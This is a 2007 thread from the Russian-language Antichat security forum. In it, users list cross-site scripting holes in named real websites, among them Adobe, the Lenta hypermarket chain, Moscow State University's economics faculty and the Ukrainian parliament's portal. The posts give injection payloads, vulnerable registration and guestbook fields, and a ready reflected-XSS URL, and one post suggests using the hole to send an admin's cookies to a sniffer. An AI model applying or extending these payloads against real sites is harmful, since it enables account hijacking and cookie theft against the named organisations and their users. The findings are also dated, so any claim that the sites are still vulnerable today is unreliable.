ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.10.2007, 02:05
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
xss
netprint.ru
Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>
Укладываемся в 40 символов.
|
|
|
03.11.2007, 03:31
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
ЛЕНТА - сеть гипермаркетов
Код:
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
|
|
|
|
03.11.2007, 17:54
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Сообщение от phol1eadeux
ЛЕНТА - сеть гипермаркетов
Код:
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
Ошибся разделом, это пассивная
|
|
|
|
03.11.2007, 18:00
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Разобрался
Последний раз редактировалось phol1eadeux; 03.11.2007 в 19:01..
|
|
|
|
04.11.2007, 02:45
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
http://nsti.ru/guest/
Гостевая книга
Добавляем во все формы: "onmouseover="alert('xss')"
|
|
|
|
04.11.2007, 21:46
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.
Код:
http://www.econ.msu.ru/
Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя
Код:
http://www.rapway.com.ru/
Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт
Гостевая книга. Уязвимо поле: Имя
Регистрируемся, идем в раздел "События", уязвимое поле - описание события.
Регистрируемся, уязвимое поле: Название блога
Че-то пост разросся =)
Последний раз редактировалось ZAMUT; 07.11.2007 в 01:56..
|
|
|
|
07.11.2007, 01:57
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Верховная Рада Украины =)
Код:
http://portal.rada.gov.ua
Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)
|
|
|
|
07.11.2007, 02:58
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Adobe.com
регимся здесь
Код:
https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus
при регистрации вставляем в любое поле
<script>alert(12121)</script>
кроме e-mail, password, zip-code...
заходим в свой аккаунт и видим активную XSS...
Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф 
__________________
Карфаген должен быть разрушен...
|
|
|
|
07.11.2007, 20:22
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė
|
|
|
|
08.11.2007, 22:53
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
P.S. Сорри за 2ой пост =)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
